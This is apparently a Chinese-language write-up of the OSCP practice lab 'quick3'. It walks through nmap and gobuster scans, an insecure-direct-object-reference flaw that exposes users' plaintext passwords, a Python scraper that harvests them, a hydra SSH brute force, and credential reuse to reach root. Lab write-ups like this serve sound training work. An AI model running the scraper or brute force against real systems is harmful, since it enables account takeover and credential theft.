【OSCP】quick3

OSCP 靶场

靶场介绍

quick3

easy

漏洞挖掘、越权测试、python爬虫、脚本编写、hydra 爆破、凭据收集

信息收集

主机发现

nmap -sn 192.168.1.0/24

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 02:02 EST
Nmap scan report for 192.168.1.51
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2e:7a:1f:17:57:44:6f:7f:f9:ce:ab:a1:4f:cd:c7:19 (ECDSA)
|_  256 93:7e:d6:c9:03:5b:a1:ee:1d:54:d0:f0:27:0f:13:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Quick Automative - Home
MAC Address: 08:00:27:28:12:35 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.80 ms 192.168.1.51

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.51 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.51
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.51/.php                 (Status: 403) [Size: 277]
http://192.168.1.51/.html                (Status: 403) [Size: 277]
http://192.168.1.51/images               (Status: 301) [Size: 313] [--> http://192.168.1.51/images/]
http://192.168.1.51/index.html           (Status: 200) [Size: 51414]
http://192.168.1.51/img                  (Status: 301) [Size: 310] [--> http://192.168.1.51/img/]
http://192.168.1.51/modules              (Status: 301) [Size: 314] [--> http://192.168.1.51/modules/]
http://192.168.1.51/css                  (Status: 301) [Size: 310] [--> http://192.168.1.51/css/]
http://192.168.1.51/lib                  (Status: 301) [Size: 310] [--> http://192.168.1.51/lib/]
http://192.168.1.51/js                   (Status: 301) [Size: 309] [--> http://192.168.1.51/js/]
http://192.168.1.51/customer             (Status: 301) [Size: 315] [--> http://192.168.1.51/customer/]
http://192.168.1.51/404.html             (Status: 200) [Size: 5013]
http://192.168.1.51/fonts                (Status: 301) [Size: 312] [--> http://192.168.1.51/fonts/]
http://192.168.1.51/.php                 (Status: 403) [Size: 277]
http://192.168.1.51/.html                (Status: 403) [Size: 277]
http://192.168.1.51/server-status        (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

权限获取

注册个账户进行漏洞挖掘，发现个人信息处存在越权漏洞，可遍历id查看任何用户

切换id 可以进行水平越权

尝试使用id=1用户进行ssh 登录但是失败了。

接下来编写脚本获取账户和密码进行ssh 爆破

import os
import re
from datetime import datetime
import requests
import urllib3
from colorama import init
init(autoreset=True)
def write1(user_match):
    curr_dir = os.getcwd()
    vuln_file = '/user_' + datetime.now().date().strftime('%Y%m%d') + '.txt'
    f = open(curr_dir + vuln_file, 'a+', encoding='utf-8')
    f.write(f"{user_match}" + "r")
    f.close()
def write2(pass_match):
    curr_dir = os.getcwd()
    vuln_file = '/passwd_' + datetime.now().date().strftime('%Y%m%d') + '.txt'
    f = open(curr_dir + vuln_file, 'a+', encoding='utf-8')
    f.write(f"{pass_match}" + "r")
    f.close()

def poc_url(id):
    urllib3.disable_warnings()
    url1 = f"http://192.168.1.51/customer/user.php?id={id}"
    proxy = {'http': 'http://127.0.0.1:8080',
             'https': 'http://127.0.0.1:8080'
             }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
        "Cookie": "PHPSESSID=bgs8b3cbme4q6kgdh4kaukh4in"
    }
    res = requests.get(url1, headers=headers, proxies=None, verify=False, timeout=5)

    if res.status_code == 200:
        user_match = re.search(r'<input type="text" id="name" name="name" value="([^"]+)" required>',
                               res.text).group(1).lower().split()[0]
        pass_match = re.search(r'<input type="password" id="oldpassword" name="oldpassword" value="([^"]+)" required>',
                               res.text).group(1)
        write1(user_match)
        write2(pass_match)

if __name__ == '__main__':
    for i in range(1, 30):
        poc_url(i)

这里爬取的名字需要把姓名去掉，由于比较少我就直接删除了，只保留了名字进行爆

hydra -L user_20240229.txt -P passwd_20240229.txt ssh://192.168.1.51

权限提升

登录进去之后进行凭据收集找到了mysql的账户密码，尝试登录root 成功。

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号（贝雷帽SEC）：【OSCP】quick3